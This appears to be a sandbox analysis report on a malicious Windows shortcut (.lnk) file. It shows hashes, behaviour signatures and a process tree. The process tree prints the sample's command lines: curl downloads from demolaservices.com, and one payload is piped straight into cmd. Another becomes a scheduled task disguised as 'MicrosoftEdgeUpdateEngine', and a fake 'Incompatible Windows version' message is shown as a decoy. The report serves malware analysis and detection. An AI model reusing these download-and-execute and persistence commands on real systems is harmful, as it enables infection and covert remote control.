Overview

overview

3

Static

static

1

414d6ed63b...85.lnk

windows11-21h2-x64

3

Resubmissions

06/03/2024, 15:01

240306-sdvz9sbf8t 7

06/03/2024, 14:59

240306-sc3cysah54 3

06/03/2024, 14:41

240306-r2taxagc37 7

Analysis

  • max time kernel
    33s
  • max time network
    47s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    06/03/2024, 14:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk

  • Size

    2KB

  • MD5

    10f4479d5f531def842a712277ae9611

  • SHA1

    bdb075abba517e216a41933cec5b30b4d50c0e76

  • SHA256

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485

  • SHA512

    5306675e38c391bb39a9b4a7bbcbeaf807e2e10bd8e1d5e560e49c77802946b39f033f653954db998d130edb08fc1add8b4dd199c4ab019c4e33fd25fcb57382

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\WINDOWS\system32\conhost.exe
      "C:\WINDOWS\system32\conhost.exe" --headless cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\WINDOWS\system32\cmd.exe
        cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2736
        • C:\Windows\system32\curl.exe
          curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php
          4⤵
            PID:576
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml
            4⤵
            • Creates scheduled task(s)
            PID:1856
          • C:\Windows\system32\msg.exe
            msg * "Incompatible Windows version. Try another Windows PC."
            4⤵
              PID:4352
      • C:\Windows\system32\conhost.EXE
        C:\Windows\system32\conhost.EXE --headless cmd /c curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=IDFVLAON_Admin & more C:\Users\public\documents\tmp.jpg | cmd
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\system32\cmd.exe
          cmd /c curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=IDFVLAON_Admin & more C:\Users\public\documents\tmp.jpg | cmd
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Windows\system32\curl.exe
            curl -o C:\Users\public\documents\tmp.jpg demolaservices.com/dxl.php?bb=IDFVLAON_Admin
            3⤵
              PID:3784
            • C:\Windows\system32\more.com
              more C:\Users\public\documents\tmp.jpg
              3⤵
                PID:2796
              • C:\Windows\system32\cmd.exe
                cmd
                3⤵
                  PID:2356
            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:1908

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
              Filesize

              10KB

              MD5

              82678367fa4297a26727ccc84e0b2f60

              SHA1

              0c65ab90390566f7d2f5b4751b9027f6bac1d22a

              SHA256

              fbf7356b28e05edc871dda40b318b147e6d07ece028da3d67c3cfbd30bfa0f29

              SHA512

              e5474444eecac25a06fe26a22dce9aa9311740dca264de1c824a36a7bc55216f301e934667fe0b9c3c7b062694f8a37e45ecce6b3889cb33bb47ecb9bd198db5

              Download Submit

            • C:\Users\Public\Documents\config.xml
              Filesize

              2KB

              MD5

              1937af09268af0f1ee47eabb62a28f2c

              SHA1

              551433d0819679f3f37e370e2b51e35336194c80

              SHA256

              1ba020416e58b45e42a854dace76cca56bebbdeebfd0abdfb4a33c12a22390d4

              SHA512

              093b9f5a4ff6fe00b7bd2ed113e220f19cc0a96ac2eaf4993ca62a05706a955353a7a7cbaa86f7630883fd680cfb95107249be42da69c94259742d6284f7b94c

              Download Submit